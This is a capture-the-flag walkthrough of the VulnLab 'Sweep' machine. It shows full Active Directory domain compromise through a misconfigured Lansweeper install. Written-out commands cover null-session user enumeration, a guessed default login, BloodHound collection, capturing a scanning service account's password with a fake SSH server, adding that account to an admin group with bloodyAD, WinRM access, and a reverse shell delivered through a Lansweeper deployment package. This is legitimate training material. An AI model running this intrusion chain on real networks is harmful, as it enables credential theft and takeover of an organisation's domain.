VL-Sweep

Vulnlab Sweep: Exploiting Lansweeper for Full Domain Compromise

In this detailed VulnLab walkthrough of the “Sweep” machine, we demonstrate how misconfigured IT asset management tools can lead to complete domain compromise. Beginning with a null session authentication vulnerability that provides initial access, we progressively escalate privileges by intercepting scanning credentials from Lansweeper - a popular network inventory solution. The challenge showcases advanced Active Directory exploitation techniques including credential harvesting, group membership manipulation, and leveraging software deployment features to gain administrator access. This step-by-step guide highlights the security risks associated with misconfigured enterprise network management tools and demonstrates practical techniques for lateral movement in Windows domain environments.

Initial Reconnaissance

First, I conducted a port scan to identify open services on the target:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
PORT      STATE SERVICE           REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
81/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
82/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
636/tcp open ldapssl? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SWEEP
| NetBIOS_Domain_Name: SWEEP
| NetBIOS_Computer_Name: INVENTORY
| DNS_Domain_Name: sweep.vl
| DNS_Computer_Name: inventory.sweep.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-04-10T22:49:54+00:00
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49718/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

I discovered that Lansweeper was running on port 81:
Lansweeper login page

Initial Access

During enumeration, I discovered that the target was vulnerable to null session authentication:

1
netexec smb 10.10.124.231 -u 'panos' -p '' --shares --users

Guest account discovered
I used lookupsid to enumerate valid usernames from the domain:

1
impacket-lookupsid sweeper.vl/panos:''@sweeper.vl -target 10.10.124.231 -no-pass 

SID lookup results
The ‘intern’ account looked suspicious. I tried using the credentials ‘intern:intern’ on the Lansweeper login page and gained access:
Successful intern login

Privilege Escalation - User

With access to the ‘intern’ account, I enumerated SMB shares:

1
netexec smb 10.10.124.231 -u 'intern' -p 'intern' --shares

SMB shares available to intern
I examined the Lansweeper share but didn’t find anything immediately useful:

1
smbclient //10.10.124.231/Lansweeper$ -U intern

Lansweeper share contents
Next, I used BloodHound to map the Active Directory environment:

1
netexec ldap 10.10.124.231 -u 'intern' -p 'intern' --bloodhound --dns-server 10.10.124.231 -c ALL --dns-tcp

BloodHound enumeration
Two accounts stood out as particularly interesting: svc_inventory_lnx and jgre808.

Exploiting Lansweeper

After logging in with intern:intern credentials, I explored the Lansweeper dashboard. I noticed that the account for Linux scanning had valid credentials, so I created a plan to intercept these credentials.
First, I created a scanning target pointing to my attack machine:
Creating a scan target
Then I set up a new mapping credential that would cause the Linux scan service account to connect to my machine:
Adding credential mapping
I also ensured my machine was marked as a Linux asset in the system:
Setting machine type to Linux
Using fakessh tool, I captured the username and password of the scanning service account when it attempted to connect to my machine:

1
fakessh ./

Captured service account credentials

Lateral Movement

Now with the svc_inventory_lnx credentials, I discovered this account had “GenericAll” privileges over the “LANSWEEPER ADMINS” group. I added the service account to this privileged group:

1
bloodyAD --host sweep.vl -u 'svc_inventory_lnx' -p '<PASS>' -d 'sweep.vl' add groupMember 'LANSWEEPER ADMINS' svc_inventory_lnx

With elevated privileges, I connected to the target using WinRM:

1
evil-winrm -i sweep.vl -u svc_inventory_lnx -p '<PASS>'

I was then able to access the user flag:

1
C:\> type user.txt

Privilege Escalation - Administrator

For the final privilege escalation, I logged into the Lansweeper application with the svc_inventory_lnx account, which now had administrative access.
I created another mapping credential targeting a Windows machine:
New mapping credential for Windows
Under the Deployment section, I created a new package that would allow me to execute commands on the target machine:
Creating deployment package
For the payload, I used a PowerShell reverse shell from revshells.com (PowerShell #2 option):
Setting up deployment payload
After clicking “Deploy Now” and selecting the appropriate asset:
Asset selection
I received a reverse shell with administrator privileges, completing the compromise:
Root access achieved
Share URL: https://api.vulnlab.com/api/v1/share?id=09c407ea-4484-4143-9d7b-866afabd26b4